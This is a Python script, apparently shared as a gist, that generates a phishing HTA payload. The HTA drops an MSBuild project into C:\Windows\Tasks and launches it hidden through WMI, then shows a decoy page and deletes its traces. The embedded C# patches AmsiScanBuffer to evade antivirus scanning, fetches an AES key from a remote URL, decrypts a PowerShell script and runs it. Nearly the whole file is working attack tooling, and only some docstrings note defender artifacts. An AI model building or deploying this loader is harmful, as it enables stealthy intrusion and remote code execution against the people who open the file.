#!/usr/bin/env python2.7
import argparse
import binascii
import sys
import base64
import hashlib
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import random
from random import randint
import string
def create_powershell():
    """Return the PowerShell text that the generated loader will carry.

    The gist ships only a placeholder marker, so as published this function
    returns no runnable script; whatever replaces the marker is what ends up
    encrypted by encrypt() and embedded in the MSBuild XML.
    """
    posh_code = """
<INSERT POWERSHELL SCRIPT HERE>
"""
    return posh_code
def encrypt(x,y):
    """AES-CBC encrypt the script text ``y`` under a key derived from ``x``.

    x -- passphrase; its MD5 hex digest (32 ASCII characters) is passed
         straight to AES.new as the key, so the effective key material is
         only the 128-bit digest.
    y -- plaintext script text.
    Returns the base64 encoding of the PKCS7-padded ciphertext.

    Side effect: the derived key is written in clear to ``key.txt`` in the
    current working directory (presumably the file later served at --url;
    see main()). The IV is a fixed literal shared with the embedded C#
    decryptor, so the same passphrase and script always produce the same
    ciphertext blob.
    """
    key = hashlib.md5()
    key.update(x)
    key = key.hexdigest()
    with open("key.txt", "w") as key_file:
        key_file.write(key + '\n')
    # Constant IV; the same literal is hard-coded in DecryptAES.Decrypt
    # inside create_msbuild().
    iv = '1234567812345678'
    aes = AES.new(key, AES.MODE_CBC, iv)
    encoder = PKCS7Encoder()
    pad_text = encoder.encode(y)
    cipher = aes.encrypt(pad_text)
    enc_cipher = base64.b64encode(cipher)
    return enc_cipher
def create_msbuild(x,y):
    """Render the MSBuild project XML that carries the encrypted script.

    x -- URL the embedded task downloads the decryption key from at run time
         (substituted into the <URL> property).
    y -- base64 ciphertext produced by encrypt() (substituted into the C#
         ``encryptedScript`` literal).
    Returns the XML text; main() base64-encodes it before handing it to
    create_hta().

    What the inline C# task (MyClass.Execute) does, as written here: it
    unconditionally overwrites the first bytes of the exported
    AmsiScanBuffer routine of amsi.dll in its own process via
    VirtualProtect/Marshal.Copy; then, only when URL is not "None", it
    echoes the URL to stdout, fetches the key with WebClient, decrypts with
    AesManaged using the same fixed IV as encrypt(), and runs the result in
    a PowerShell runspace piped through Out-String. Defender-relevant
    artifacts: msbuild.exe with an XML project from C:\\Windows\\Tasks,
    that process loading System.Management.Automation and touching amsi.dll,
    and an outbound HTTP GET for the key.
    """
    xml = """
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe MSUpdate.xml -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''"></FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<URL Condition="'$(URL)' == ''">%s</URL>
</PropertyGroup>
<Target Name="Run">
<MyClass />
</Target>
<UsingTask
TaskName="MyClass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Security.Cryptography;
using System.Linq;
public class MyClass : Task, ITask
{
public string funcName = "$(FunctionName)";
public string Cmd = "$(Cmd)";
public string URL = "$(URL)";
public string encScript = "";
public string encryptedScript = "";
public string decryptedString = "";
public string x = "";
public string newKey = "";
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
public override bool Execute()
{
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
String funcName = string.Join("", chars);
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
String libName = string.Join("", chars2);
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(Patch, 0, Address, 6);
if (URL != "None")
{
var key = string.Empty;
using (var webClient = new System.Net.WebClient())
{
Console.Write(URL);
key = webClient.DownloadString(URL);
newKey = key.Replace( "\\r", "").Replace( "\\n", "" );
string encryptedScript = "%s";
string decryptedString = DecryptAES.Decrypt(encryptedScript, newKey);
var bytes = Encoding.UTF8.GetBytes(decryptedString);
var encScript = Convert.ToBase64String(bytes);
byte[] data = Convert.FromBase64String(encScript);
string x = Encoding.ASCII.GetString(data);
RunPSCommand(x);
}
}
return true;
}
public static string RunPSCommand(string cmd)
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
public class DecryptAES
{
public static string Decrypt(string cipherText, string key)
{
string enc_cipher = cipherText;
var textEncoder = new UTF8Encoding();
var aes = new AesManaged();
aes.Key = textEncoder.GetBytes(key);
aes.IV = textEncoder.GetBytes("1234567812345678");
var decryptor = aes.CreateDecryptor();
var cipher = Convert.FromBase64String(enc_cipher);
var text_bytes = decryptor.TransformFinalBlock(cipher, 0, cipher.Length);
var text = textEncoder.GetString(text_bytes);
return text;
}
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
""" % (x,y)
    return xml
def create_hta(x,y,z):
    """Write ``<y>.hta``, the VBScript HTA that stages and launches the XML.

    x -- base64 of the MSBuild project XML from create_msbuild().
    y -- HTA file name without extension (also the name the HTA deletes
         from its own directory once the task is started).
    z -- decoy URL that the HTA opens in Internet Explorer.
    Returns nothing; the HTA text is written to ``y + ".hta"`` in the
    current directory.

    The embedded VBScript, as written here: base64-decodes ``x`` through an
    MSXML node and ADODB.Stream, writes it to C:\\Windows\\Tasks\\<name>.xml
    where <name> is 0-9 random lowercase letters chosen on the Python side,
    launches msbuild.exe on that file via WMI Win32_Process.Create with a
    hidden window (Framework64 path when the CPU reports a 64-bit address
    width), deletes the HTA itself, navigates IE to the decoy, busy-waits
    about one second, deletes the XML and closes. The VBScript RandomString()
    helper is defined and called but its result is not used for the file
    name. Defender-relevant artifacts: mshta -> WMI-spawned msbuild.exe, a
    short-lived XML under C:\\Windows\\Tasks, and cmd.exe /c del children.
    """
    length = randint(0,9)
    t = ''.join(random.choice(string.lowercase) for i in range(length))
    hta_name = y
    hta = """
<script language="VBScript">
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream 'As New Stream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
Set oNode = Nothing
Set oXML = Nothing
End Function
Dim data
data = "%s"
Dim content
content = Base64Decode(data)
function RandomString()
Randomize()
dim CharacterSetArray
CharacterSetArray = Array(_
Array(7, "abcdefghijklmnopqrstuvwxyz"), _
Array(1, "0123456789") _
)
dim i
dim j
dim Count
dim Chars
dim Index
dim Temp
for i = 0 to UBound(CharacterSetArray)
Count = CharacterSetArray(i)(0)
Chars = CharacterSetArray(i)(1)
for j = 1 to Count
Index = Int(Rnd() * Len(Chars)) + 1
Temp = Temp & Mid(Chars, Index, 1)
next
next
dim TemCopy
do until Len(Temp) = 0
Index = Int(Rnd() * Len(Temp)) + 1
TempCopy = TempCopy & Mid(Temp, Index, 1)
Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
loop
RandomString = TempCopy
end function
Dim filename
filename = RandomString()
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Tasks\\%s.xml",2,true)
objFileToWrite.WriteLine(content)
objFileToWrite.Close
Set objFileToWrite = Nothing
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth _
= 64 Then
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null , objConfig, intProcessID)
Else
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null, objConfig, intProcessID)
End If
dim fso: set fso = CreateObject("Scripting.FileSystemObject")
dim CurrentDirectory
CurrentDirectory = fso.GetAbsolutePathName(".")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd.exe /c del %s.hta", CurrentDirectory, objConfig, intProcessID)
Dim IE
Dim MyDocument
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = 1
IE.navigate "%s"
Dim dteWait
dteWait = DateAdd("s", 1, Now())
Do Until (Now() > dteWait)
Loop
errReturn = objProcess.Create("cmd.exe /c del C:\\windows\\tasks\\%s.xml", CurrentDirectory, objConfig, intProcessID)
self.close
</script>
""" % (x,t,t,t,hta_name,z,t)
    f = open(hta_name + ".hta", "w+")
    f.write(hta + '\n')
    f.close()
def main():
    """CLI entry point: build the encrypted script, the MSBuild XML and the HTA.

    Pipeline: create_powershell() -> encrypt(--key) -> create_msbuild(--url)
    -> base64 -> create_hta(--hta, --decoy). Outputs left in the working
    directory are ``<hta>.hta`` and, as a side effect of encrypt(),
    ``key.txt`` holding the derived key in clear.
    """
    parser = argparse.ArgumentParser(description="Generate Payload")
    parser.add_argument('--key', help="AES Key or Passphrase", required=True)
    parser.add_argument('--url', help="URL to the key", required=True)
    parser.add_argument('--decoy', help="URL to decoy document", required=True)
    parser.add_argument('--hta', help="HTA file name. Extension added.", required=True)
    args = parser.parse_args()
    powershell = create_powershell()
    encrypted_powershell = encrypt(args.key,powershell)
    msbuild = create_msbuild(args.url,encrypted_powershell)
    encodedMSBuild = base64.b64encode(msbuild)
    create_hta(encodedMSBuild, args.hta, args.decoy)
# Run the generator only when executed directly (the shebang pins Python 2.7).
if __name__ == "__main__":
    main()